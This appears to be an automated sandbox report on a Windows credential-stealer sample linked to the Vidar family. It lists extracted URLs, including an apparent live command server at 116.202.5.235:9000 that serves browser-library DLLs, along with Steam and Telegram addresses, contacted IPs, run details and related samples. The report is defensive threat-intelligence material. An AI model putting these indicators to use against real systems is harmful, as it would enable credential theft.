https://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://116.202.5.235:9000/softokn3.dlldge	RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.s	RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=6MtR	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://116.202.5.235:9000/mozglue.dllEdge	RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en	RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://116.202.5.235:9000/nss3.dll2	RegAsm.exe, 00000002.00000002.2900946263.00000000013E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://116.202.5.235:9000/softokn3.dllf	RegAsm.exe, 00000002.00000002.2900946263.00000000013E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.5.235:9000/freebl3.dllEdge	RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://116.202.5.235:9000	RegAsm.exe, 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://116.202.5.235:9000/vcruntime140.dllets	RegAsm.exe, 00000002.00000002.2900806294.000000000138F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.5.235:9000/msvcp140.dlldge	RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199686524322	76561199686524322[1].htm.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://116.202.5.235:9000/sqlx.dll	RegAsm.exe, 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmp	false	10%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://116.202.5.235:9000ing	RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/points/shop/	RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	FHJEGI.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://steamcommunity.com/_	RegAsm.exe, 00000002.00000002.2900507814.0000000001272000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp, DHCFID.2.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	FHJEGI.2.dr	false	URL Reputation: safe	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://116.202.5.235:9000/softokn3.dll	RegAsm.exe, 00000002.00000002.2900946263.00000000013E9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.5.235:9000/softokn3.dll2	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	DHCFID.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://116.202.5.235:9000/nss3.dllft	RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/about/	76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://116.202.5.235:9000/vcruntime140.dllUser	RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/my/wishlist/	RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://t.me/	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://116.202.5.235:9000/vcruntime140.dll.	RegAsm.exe, 00000002.00000002.2900806294.000000000138F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://web.telegram.org	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://116.202.5.235:9000/v	RegAsm.exe, 00000002.00000002.2900987028.00000000013F7000.00000004.00000020.00020000.00000000.sdmp	false	10%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://help.steampowered.com/en/	RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/market/	RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://store.steampowered.com/news/	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGAFt&a	RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	FHJEGI.2.dr	false	URL Reputation: safe	unknown
http://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp, DHCFID.2.dr	false	URL Reputation: safe	unknown
https://116.202.5.235:9000/mozglue.dll	RegAsm.exe, 00000002.00000002.2900946263.00000000013E9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.5.235:9000/	RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.5.235:9000/f	RegAsm.exe, 00000002.00000002.2900987028.00000000013F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://116.202.5.235:9000/b	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/discussions/	RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
https://116.202.5.235:9000/vcruntime140.dllO	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/stats/	RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/steam_refunds/	RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	DHCFID.2.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	FHJEGI.2.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199686524322/inventory/	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199686524322/badges	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/workshop/	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/legal/	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=L3Ed_Gybseku&l=e	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
http://www.sqlite.org/copyright.html.	RegAsm.exe, 00000002.00000002.2901515013.00000000134DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=soQOTmUz	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
https://116.202.5.235:9000/vcruntime140.dllh	RegAsm.exe, 00000002.00000002.2900806294.000000000138F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	FHJEGI.2.dr	false	Avira URL Cloud: safe	unknown
https://116.202.5.235:9000/msvcp140.dllD	RegAsm.exe, 00000002.00000002.2900806294.0000000001380000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.5.235:9000/vcruntime140.dllc	RegAsm.exe, 00000002.00000002.2900806294.000000000138F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.5.235:9000/freebl3.dll	RegAsm.exe, 00000002.00000002.2900946263.00000000013E9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://116.202.5.235/	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/	76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.102.42.29	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
116.202.5.235	unknown	Germany	24940	HETZNER-ASDE	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1443958
Start date and time:	2024-05-19 09:08:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/9@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 74 Number of non-executed functions: 244
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:09:04	API Interceptor	1x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.102.42.29	https://steam.poweredcommunityart.com/artwork/?id=8513444218	Get hash	malicious	Unknown	Browse
	qbs5CBr95m.exe	Get hash	malicious	CryptOne, Vidar	Browse
	Xy52lgBlGY.exe	Get hash	malicious	CryptOne, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	CryptOne, Vidar	Browse
	SecuriteInfo.com.Win32.Malware-gen.24694.6353.exe	Get hash	malicious	CryptOne, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	https://steamfiller.ru/	Get hash	malicious	Unknown	Browse
	https://store-steampowered-com.glitch.me/	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	CryptOne, Vidar	Browse
116.202.5.235	qbs5CBr95m.exe	Get hash	malicious	CryptOne, Vidar	Browse
	Xy52lgBlGY.exe	Get hash	malicious	CryptOne, Vidar	Browse
	file.exe	Get hash	malicious	CryptOne, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	SecuriteInfo.com.Win32.Malware-gen.24694.6353.exe	Get hash	malicious	CryptOne, Vidar	Browse
149.154.167.99	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot
	vSlVoTPrmP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot
	RO67OsrIWi.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot
	KeyboardRGB.exe	Get hash	malicious	Unknown	Browse	t.me/cinoshibot
	file.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	66AF3M5zgO.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	qbs5CBr95m.exe	Get hash	malicious	CryptOne, Vidar	Browse	149.154.167.99
	Xy52lgBlGY.exe	Get hash	malicious	CryptOne, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	CryptOne, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	CryptOne, Vidar	Browse	149.154.167.99
	https://gvx.nsm.mybluehost.me/hu/	Get hash	malicious	Unknown	Browse	50.87.170.37
	SecuriteInfo.com.Win32.Malware-gen.24694.6353.exe	Get hash	malicious	CryptOne, Vidar	Browse	149.154.167.99
steamcommunity.com	https://steam.poweredcommunityart.com/artwork/?id=8513444218	Get hash	malicious	Unknown	Browse	104.102.42.29
	qbs5CBr95m.exe	Get hash	malicious	CryptOne, Vidar	Browse	104.102.42.29
	Xy52lgBlGY.exe	Get hash	malicious	CryptOne, Vidar	Browse	104.102.42.29
	file.exe	Get hash	malicious	CryptOne, Vidar	Browse	23.199.218.33
	file.exe	Get hash	malicious	Vidar	Browse	104.102.42.29
	file.exe	Get hash	malicious	Vidar	Browse	23.192.247.89
	file.exe	Get hash	malicious	CryptOne, Vidar	Browse	104.102.42.29
	SecuriteInfo.com.Win32.Malware-gen.24694.6353.exe	Get hash	malicious	CryptOne, Vidar	Browse	104.102.42.29
	file.exe	Get hash	malicious	Vidar	Browse	104.102.42.29

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	66AF3M5zgO.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	qbs5CBr95m.exe	Get hash	malicious	CryptOne, Vidar	Browse	149.154.167.99
	Xy52lgBlGY.exe	Get hash	malicious	CryptOne, Vidar	Browse	149.154.167.99
